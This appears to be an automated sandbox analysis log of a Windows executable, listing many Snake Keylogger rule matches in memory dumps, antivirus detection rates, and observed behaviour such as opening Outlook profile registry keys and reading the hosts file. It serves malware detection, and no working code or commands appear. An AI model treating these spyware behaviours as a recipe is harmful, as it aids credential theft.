                Source: 00000000.00000002.738244012.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737409041.0000000002920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738141181.0000000002A95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737889019.0000000002A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737855627.00000000029FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737285680.00000000028EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000000.429980691.0000000000532000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738079094.0000000002A7D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738039601.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738059775.0000000002A79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738194827.0000000002AA5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737190839.00000000028A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737592635.0000000002970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738181191.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737144637.000000000288C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737978655.0000000002A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737655258.0000000002988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.735961437.0000000000532000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737628909.0000000002980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737833563.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737414593.0000000002924000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737929824.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737560330.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737825477.00000000029F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738023885.0000000002A6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738485397.0000000002AE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737575208.0000000002968000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737808101.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737431755.0000000002930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737466902.0000000002940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737280426.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737670833.000000000298C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737689328.0000000002994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737225304.00000000028C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737609149.0000000002978000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737936851.0000000002A49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737641884.0000000002984000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738147230.0000000002A99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738223259.0000000002AAD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738314614.0000000002AC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737450837.0000000002938000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737597795.0000000002974000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738125525.0000000002A8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738160524.0000000002A9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738425558.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738406461.0000000002AD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738262050.0000000002AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737864301.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737968200.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737105124.0000000002867000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737263659.00000000028DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737253851.00000000028D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738109588.0000000002A89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737973247.0000000002A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737457876.000000000293C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737523761.0000000002950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737154483.0000000002890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737212904.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737268236.00000000028DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737839802.00000000029F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738270244.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738131471.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737420491.0000000002928000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738395968.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738017194.0000000002A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737513462.000000000294C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737567001.0000000002964000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000003.670353008.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.739661705.000000000671A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: 0OZQi3b0tM.exe PID: 7100, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C671960_2_00C67196
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C661110_2_00C66111
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C6F2800_2_00C6F280
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C683C90_2_00C683C9
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C6A45D0_2_00C6A45D
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C655870_2_00C65587
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C6F6D80_2_00C6F6D8
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C676A80_2_00C676A8
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C6E7580_2_00C6E758
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C66B880_2_00C66B88
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C67B080_2_00C67B08
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C6FB310_2_00C6FB31
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C6EE290_2_00C6EE29
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C67F680_2_00C67F68
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C671E00_2_00C671E0
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C64A980_2_00C64A98
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C64AA80_2_00C64AA8
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C66B780_2_00C66B78
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C62C290_2_00C62C29
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C6DFD00_2_00C6DFD0
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_00C6DFE00_2_00C6DFE0
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC04980_2_04EC0498
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04ECB44C0_2_04ECB44C
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC16F80_2_04EC16F8
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC36780_2_04EC3678
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04ECB7980_2_04ECB798
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC00400_2_04EC0040
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC30280_2_04EC3028
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC23980_2_04EC2398
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC43180_2_04EC4318
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC3CC80_2_04EC3CC8
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC1D480_2_04EC1D48
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC4FB00_2_04EC4FB0
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC08F00_2_04EC08F0
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC58500_2_04EC5850
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC29E00_2_04EC29E0
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC49680_2_04EC4968
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC04880_2_04EC0488
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04ECC4100_2_04ECC410
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC16E70_2_04EC16E7
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC36680_2_04EC3668
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC001E0_2_04EC001E
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC30180_2_04EC3018
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC23890_2_04EC2389
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC43080_2_04EC4308
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC3CB80_2_04EC3CB8
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC1D390_2_04EC1D39
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC4F9F0_2_04EC4F9F
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC8F000_2_04EC8F00
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC8F100_2_04EC8F10
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC08E00_2_04EC08E0
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC29CF0_2_04EC29CF
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeCode function: 0_2_04EC49580_2_04EC4958
                Source: 0OZQi3b0tM.exe, 00000000.00000002.736120314.00000000008F7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 0OZQi3b0tM.exe
                Source: 0OZQi3b0tM.exe, 00000000.00000002.736050763.0000000000552000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameYFGGCVyufgtwfyuTGFWTVFAUYVF.exeX vs 0OZQi3b0tM.exe
                Source: 0OZQi3b0tM.exeBinary or memory string: OriginalFilenameYFGGCVyufgtwfyuTGFWTVFAUYVF.exeX vs 0OZQi3b0tM.exe
                Source: 0OZQi3b0tM.exeVirustotal: Detection: 73%
                Source: 0OZQi3b0tM.exeMetadefender: Detection: 48%
                Source: 0OZQi3b0tM.exeReversingLabs: Detection: 88%
                Source: 0OZQi3b0tM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@4/2
                Source: 0OZQi3b0tM.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: 0OZQi3b0tM.exeString found in binary or memory: F-Stopw
                Source: 0OZQi3b0tM.exeString found in binary or memory: F-Stopw
                Source: 0OZQi3b0tM.exe, ??u0609?ufffd/Bufffdu02f3?u061d.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: 0OZQi3b0tM.exe, u003b?u058f??/?u0040???.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, ??u0609?ufffd/Bufffdu02f3?u061d.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, u003b?u058f??/?u0040???.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, ??u0609?ufffd/Bufffdu02f3?u061d.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, u003b?u058f??/?u0040???.csCryptographic APIs: 'TransformFinalBlock'
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: 0OZQi3b0tM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: 0OZQi3b0tM.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\0OZQi3b0tM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
